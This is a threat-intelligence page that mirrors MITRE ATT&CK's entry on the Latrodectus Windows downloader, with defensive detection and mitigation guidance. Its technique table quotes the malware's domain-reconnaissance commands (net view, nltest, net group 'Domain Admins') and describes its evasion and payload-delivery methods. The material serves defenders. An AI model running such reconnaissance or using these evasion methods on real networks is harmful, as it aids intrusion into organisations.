S1160: Latrodectus
Latrodectus is a Windows malware downloader that has been used since at least 2023 to download and execute additional payloads and modules. Latrodectus has most often been distributed through email campaigns, primarily by TA577 and TA578, and has infrastructure overlaps with historic IcedID operations.[1][2][3]
Analyst context for executives and security teams
Latrodectus matters because it is described as a Windows downloader: its business risk is not only the first malware event, but what it may enable next through additional payloads and modules. For leaders, this should be treated as a readiness test for email-driven intrusion prevention, Windows endpoint visibility, command-and-control monitoring, and incident response containment before follow-on tooling or data access occurs.
Executive priority
Prioritize Latrodectus as a control-validation scenario rather than a single-signature malware problem. The supplied ATT&CK relationships show behaviors across execution, persistence, discovery, command and control, lateral movement, collection, exfiltration, and stealth. Executives should ask whether the organization can prove visibility from email delivery through Windows execution, scheduled task or WMI abuse, domain discovery, web-based C2, tool download, and potential data movement. This is relevant to business continuity and audit evidence because gaps in any one layer can delay containment of a downloader that is designed to bring in more capability.
Technical view
For SOC, detection engineering, and IR teams, validate coverage on Windows endpoints for downloader-style activity chained from email campaigns into script or command execution, WMI, scheduled tasks, process and file discovery, domain account/group enumeration, VNC-related remote control, web-protocol C2, web-service use, multi-stage channels, ingress tool transfer, local data collection, file deletion, and exfiltration over an existing C2 channel. Because ATT&CK provides no official detection text for this object, detections should be behavior-led and correlated across host, identity, email, and network telemetry rather than dependent on hashes or static signatures, especially given the related obfuscation techniques such as packing, binary padding, dynamic API resolution, and encrypted or encoded files.
Likely telemetry
- Email security logs for campaign delivery, attachments, links, sender infrastructure, and user interaction context.
- Windows endpoint telemetry for process creation, parent-child process chains, command-line arguments, script execution, file writes, module or payload drops, and file deletion.
- Windows management and persistence evidence, including WMI activity and scheduled task creation or modification.
- Identity and directory telemetry for domain account, domain group, logged-on user, and permission discovery patterns.
- Network telemetry including DNS, proxy, firewall, TLS metadata, HTTP/S request patterns, and outbound connections to web services or staged C2 infrastructure.
Detection direction
- Build correlation around sequences: email-originated execution followed by Windows command shell or JavaScript activity, discovery commands, scheduled task or WMI use, and outbound web traffic.
- Tune for behavioral anomalies rather than only indicators, since related techniques include binary padding, software packing, dynamic API resolution, and encoded or encrypted files that can weaken hash and static-signature approaches.
- Baseline legitimate administrative use of WMI, scheduled tasks, command shell, domain enumeration, and VNC to reduce false positives while preserving alerting for unusual parent processes, users, hosts, or timing.
- Validate network detections for web-protocol C2 and legitimate web-service abuse, including cases where traffic blends into common HTTP/S activity.
- Ensure IR triage playbooks look for follow-on payload transfer and multi-stage C2, not just removal of the first observed downloader artifact.
Mitigation priorities
- Start with email security and user-reporting workflows because the official description states Latrodectus has most often been distributed through email campaigns.
- Harden Windows execution paths by limiting unnecessary script execution, monitoring command shell usage, and controlling abuse-prone administrative mechanisms such as WMI and scheduled tasks.
- Reduce identity blast radius by reviewing domain account and group exposure, privileged group membership, and monitoring for abnormal enumeration.
- Restrict and monitor remote access tools such as VNC where not required, and require strong authorization and logging where they are business-approved.
- Improve outbound control by validating proxy, DNS, and firewall policies for unusual web-protocol C2, web-service use, and ingress tool transfer.
Analyst notes and limits
The object is a malware entry for Latrodectus, S1160, in enterprise ATT&CK version 19.1. MITRE describes it as a Windows malware downloader used since at least 2023 to download and execute additional payloads and modules, most often distributed through email campaigns, primarily by TA577 and TA578, with infrastructure overlaps with historic IcedID operations. The relationship set supplies the practical behavior map: discovery, execution, persistence, lateral movement via VNC, command and control, ingress transfer, local data collection, exfiltration over C2, and multiple stealth techniques.
MITRE provides no official detection text for this object, and the supplied top-level tactics are not specified. This take therefore focuses on the official description, Windows platform field, external references, and listed technique relationships. Local conclusions about exposure, active exploitation, control coverage, attribution, or impact require environment-specific telemetry and incident evidence.
Latrodectus
Latrodectus is a Windows malware downloader that has been used since at least 2023 to download and execute additional payloads and modules. Latrodectus has most often been distributed through email campaigns, primarily by TA577 and TA578, and has infrastructure overlaps with historic IcedID operations.[1][2][3]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1102 | Web Service | Latrodectus has used Google Firebase to download malicious installation scripts.CitationPalo Alto Latrodectus Activity June 2024 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | Latrodectus can use rundll32.exe to execute downloaded DLLs.CitationElastic Latrodectus May 2024CitationBleeping Computer Latrodectus April 2024 |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | Latrodectus has Base64-encoded the message body of a HTTP request sent to C2.CitationLatrodectus APR 2024CitationElastic Latrodectus May 2024 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | The Latrodectus command handler can use `cmdexe` to run multiple discovery commands.CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1016 | System Network Configuration Discovery | Latrodectus can discover the IP and MAC address of a targeted host.CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1218.007 | Msiexec Sub-technique | Latrodectus has called `msiexec` to install remotely-hosted MSI files.CitationLatrodectus APR 2024CitationBleeping Computer Latrodectus April 2024 |
| Enterprise | T1135 | Network Share Discovery | Latrodectus can run `C:\Windows\System32\cmd.exe /c net view /all` to discover network shares.CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1057 | Process Discovery | Latrodectus can enumerate running processes including process grandchildren on targeted hosts.CitationLatrodectus APR 2024CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1033 | System Owner/User Discovery | Latrodectus can discover the username of an infected host.CitationElastic Latrodectus May 2024 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Latrodectus can create scheduled tasks for persistence.CitationLatrodectus APR 2024CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1204.001 | Malicious Link Sub-technique | Latrodectus has been executed through malicious links distributed in email campaigns.CitationLatrodectus APR 2024CitationBleeping Computer Latrodectus April 2024 |
| Enterprise | T1027.007 | Dynamic API Resolution Sub-technique | Latrodectus can resolve Windows APIs dynamically by hash.CitationLatrodectus APR 2024 |
| Enterprise | T1005 | Data from Local System | Latrodectus can collect data from a compromised host using a stealer module.CitationBitsight Latrodectus June 2024 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Latrodectus has been distributed through reply-chain phishing emails with malicious attachments.CitationBleeping Computer Latrodectus April 2024 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Latrodectus has the ability to deobfuscate encrypted strings.CitationLatrodectus APR 2024CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1070.004 | File Deletion Sub-technique | Latrodectus has the ability to delete itself.CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1083 | File and Directory Discovery | Latrodectus can collect desktop filenames.CitationLatrodectus APR 2024CitationBitsight Latrodectus June 2024CitationElastic Latrodectus May 2024 |
| Enterprise | T1559.001 | Component Object Model Sub-technique | Latrodectus can use the Windows Component Object Model (COM) to set scheduled tasks.CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1027.002 | Software Packing Sub-technique | The Latrodectus payload has been packed for obfuscation.CitationElastic Latrodectus May 2024 |
| Enterprise | T1059.007 | JavaScript Sub-technique | Latrodectus has used JavaScript files as part its infection chain during malicious spam email campaigns.CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024CitationPalo Alto Latrodectus Activity June 2024 |
| Enterprise | T1105 | Ingress Tool Transfer | Latrodectus can download and execute PEs, DLLs, and shellcode from C2.CitationLatrodectus APR 2024CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Latrodectus can send registration information to C2 via HTTP `POST`.CitationLatrodectus APR 2024CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Latrodectus can exfiltrate encrypted system information to the C2 server.CitationLatrodectus APR 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | Latrodectus has been packed to appear as a component to Bitdefender’s kernel-mode driver, TRUFOS.SYS.CitationElastic Latrodectus May 2024 |
| Enterprise | T1106 | Native API | Latrodectus has used multiple Windows API post exploitation including `GetAdaptersInfo`, `CreateToolhelp32Snapshot`, and `CreateProcessW`.CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1204.002 | Malicious File Sub-technique | Latrodectus has lured users into opening malicious email attachments for execution.CitationBleeping Computer Latrodectus April 2024 |
| Enterprise | T1104 | Multi-Stage Channels | Latrodectus has used a two-tiered C2 configuration with tier one nodes connecting to the victim and tier two nodes connecting to backend infrastructure.CitationLatrodectus APR 2024 |
| Enterprise | T1482 | Domain Trust Discovery | Latrodectus can run `C:\Windows\System32\cmd.exe /c nltest /domain_trusts` to discover domain trusts.CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1027.001 | Binary Padding Sub-technique | Latrodectus has been obfuscated with a 129 byte sequence of junk data prepended to the file.CitationElastic Latrodectus May 2024 |
| Enterprise | T1529 | System Shutdown/Reboot | Latrodectus has the ability to restart compromised hosts.CitationElastic Latrodectus May 2024 |
| Enterprise | T1082 | System Information Discovery | Latrodectus can gather operating system information.CitationLatrodectus APR 2024CitationElastic Latrodectus May 2024CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | Latrodectus has the ability to identify installed antivirus products.CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1573.001 | Symmetric Cryptography Sub-technique | Latrodectus can send RC4 encrypted data over C2 channels.CitationLatrodectus APR 2024CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1564.004 | NTFS File Attributes Sub-technique | Latrodectus can delete itself while its process is still running through the use of an alternate data stream.CitationElastic Latrodectus May 2024 |
| Enterprise | T1069.002 | Domain Groups Sub-technique | Latrodectus can identify domain groups through `cmd.exe /c net group "Domain Admins" /domain`.CitationBitsight Latrodectus June 2024CitationElastic Latrodectus May 2024 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Latrodectus has used a pseudo random number generator (PRNG) algorithm and a rolling XOR key to obfuscate strings.CitationLatrodectus APR 2024CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Latrodectus can set an AutoRun key to establish persistence.CitationLatrodectus APR 2024 |
| Enterprise | T1497.001 | System Checks Sub-technique | Latrodectus can determine if it is running in a virtualized environment by checking the OS version, checking the number of running processes, ensuring a 64-bit application is running on a 64-bit host, and checking if the host has a valid MAC address.CitationLatrodectus APR 2024CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | Latrodectus has been distributed to victims through emails containing malicious links.CitationLatrodectus APR 2024CitationBleeping Computer Latrodectus April 2024 |
| Enterprise | T1047 | Windows Management Instrumentation | Latrodectus has used WMI in malicious email infection chains to facilitate the installation of remotely-hosted files.CitationElastic Latrodectus May 2024CitationBitsight Latrodectus June 2024 |
| Enterprise | T1622 | Debugger Evasion | Latrodectus has the ability to check for the presence of debuggers.CitationLatrodectus APR 2024 |
| Enterprise | T1087.002 | Domain Account Sub-technique | Latrodectus can run `C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain` to identify domain administrator accounts.CitationElastic Latrodectus May 2024 |
| Enterprise | T1021.005 | VNC Sub-technique | Latrodectus has routed C2 traffic using Keyhole VNC.CitationPalo Alto Latrodectus Activity June 2024 |
Groups, software, and campaigns
G1037: TA577
TA577 is an initial access broker (IAB) that has distributed QakBot and Pikabot, and was among the first observed groups distributing Latrodectus in 2023.[1]
G1038: TA578
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | bee5219d1dcc… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Latrodectus APR 2024
Proofpoint Threat Research and Team Cymru S2 Threat Research. (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May 31, 2024.
Open source URL -
[2]
Bleeping Computer Latrodectus April 2024
Abrams, L. (2024, April 30). New Latrodectus malware attacks use Microsoft, Cloudflare themes. Retrieved September 13, 2024.
Open source URL -
[3]
Bitsight Latrodectus June 2024
Batista, J. (2024, June 17). Latrodectus, are you coming back?. Retrieved September 13, 2024.
Open source URL -
[4]
IceNova
(Citation: Bleeping Computer Latrodectus April 2024)
-
[5]
Unidentified 111
(Citation: Bleeping Computer Latrodectus April 2024)
-
[6]
mitre-attack S1160Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.